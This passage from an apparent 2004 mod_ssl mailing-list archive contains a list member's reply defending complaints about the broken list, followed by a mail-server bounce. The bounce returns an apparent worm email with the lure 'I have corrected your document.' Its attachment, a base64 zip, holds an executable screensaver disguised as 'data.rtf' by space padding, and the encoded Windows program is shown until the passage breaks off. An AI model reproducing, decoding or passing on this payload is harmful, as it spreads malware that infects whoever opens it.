fDZIER/wIgg/tAHyOzFLSIE=
=HNT6
-----END PGP SIGNATURE-----

--=-0trsHaKpfkqabt0jkxFk--


From Owen.Boyle@swx.com  Thu Apr  1 10:24:13 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id AFFA9A8940
	for ; Thu,  1 Apr 2004 10:23:57 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id i318NqHC007040
	for ; Thu, 1 Apr 2004 10:23:52 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i318Nq7k007169
	for ; Thu, 1 Apr 2004 10:23:52 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: [Fwd: Re: Shut the list down]
Date: Thu, 1 Apr 2004 10:23:51 +0200
Message-ID: 
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Priority: normal
Thread-Topic: [Fwd: Re: Shut the list down]
Thread-Index: AcQXWSY3YJnc4jHjTm+1r6Mh9GULkwAZ80xA
From: "Boyle Owen" 
To: 

> -----Original Message-----
> From: Joachim Feise [mailto:jfeise@ics.uci.edu]
>=20
> And can you tell me why your problems with an unresponsive gives you
> the right to spam the list with your petty problems?
> You can always just /dev/null the mails.

I am a long-term subscriber and contributor to tis list and since I do
not wish to unsubscribe, I am not a "me-too" and therefore undeserving
of your dire spam-cop threat.

I do, however, take issue with your hectoring attitude. I see no reason
why the list is not a valid forum to discuss problems with the list
management and operation. Far from being "content-free", the me-too
mails allow us to measure the extent of the problem and thus establish
that it is not an isolated case of a few users who don't know how to
unsubscribe properly. Rather, it is a general problem and the excellent
diagnosis by Derrick Fogle even pin-points the problem: the list server
is not running major-domo.

The main reason, however, for posting complaints to the list is that it
is not unreasonable to expect the list to contain someone who is a list
administrator. That this does not appear to be the case here, is no
fault of the poster.

If the list is soon repaired, it will be a direct result of the heat and
noise generated by the debate that you would prefer to stifle.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20
>=20
> -Joe
>=20
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20



From MAILER-DAEMON  Thu Apr  1 16:49:21 2004
Return-Path: <>
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from pop05.wanadoo.nl (pop05.wanadoo.nl [194.134.35.180])
	by master.modssl.org (Postfix) with ESMTP id 7340FA8A51
	for ; Thu,  1 Apr 2004 16:49:05 +0200 (CEST)
Received: by pop05.wanadoo.nl (Postfix)
	id A80BF1BB86; Thu,  1 Apr 2004 16:49:04 +0200 (CEST)
Date: Thu,  1 Apr 2004 16:49:04 +0200 (CEST)
From: MAILER-DAEMON@pop05.wanadoo.nl (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: modssl-users-l@master.modssl.org
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="523991BB64.1080830944/pop05.wanadoo.nl"
Message-Id: <20040401144904.A80BF1BB86@pop05.wanadoo.nl>

This is a MIME-encapsulated message.

--523991BB64.1080830944/pop05.wanadoo.nl
Content-Description: Notification
Content-Type: text/plain

This is the Postfix program at host pop05.wanadoo.nl.

I'm sorry to have to inform you that the message returned
below could not be delivered to one or more destinations.

For further assistance, please send mail to 

If you do so, please include this problem report. You can
delete your own text from the message returned below.

			The Postfix program

<72360721@pop05.wanadoo.nl>: service unavailable. Command output: mail.local:
    robian@wanadoo.nl: mailbox size exceeded (25166894 bytes)

--523991BB64.1080830944/pop05.wanadoo.nl
Content-Description: Delivery error report
Content-Type: message/delivery-status

Reporting-MTA: dns; pop05.wanadoo.nl
Arrival-Date: Thu,  1 Apr 2004 16:49:04 +0200 (CEST)

Final-Recipient: rfc822; 72360721@pop05.wanadoo.nl
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; service unavailable. Command output: mail.local:
    robian@wanadoo.nl: mailbox size exceeded (25166894 bytes)

--523991BB64.1080830944/pop05.wanadoo.nl
Content-Description: Undelivered Message
Content-Type: message/rfc822

Received: from mx3.wanadoo.nl (mx3.wanadoo.nl [194.134.35.136])
	by pop05.wanadoo.nl (Postfix) with ESMTP id 523991BB64
	for <72360721@pop05.wanadoo.nl>; Thu,  1 Apr 2004 16:49:04 +0200 (CEST)
Received: by mx3.wanadoo.nl (Postfix)
	id C2AA61886; Thu,  1 Apr 2004 16:48:58 +0200 (MEST)
Received: from wanadoo.nl (ool-182f67c3.dyn.optonline.net [24.47.103.195])
	by mx3.wanadoo.nl (Postfix) with ESMTP id 1F570186E
	for ; Thu,  1 Apr 2004 16:48:54 +0200 (MEST)
From: modssl-users-l@master.modssl.org
To: robian@wanadoo.nl
Subject: Re: Question
Date: Thu, 1 Apr 2004 09:50:55 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20040401144854.1F570186E@mx3.wanadoo.nl>

This is a multi-part message in MIME format.

------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

I have corrected your document.


------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: application/octet-stream;
	name="sample01.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="sample01.zip"

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
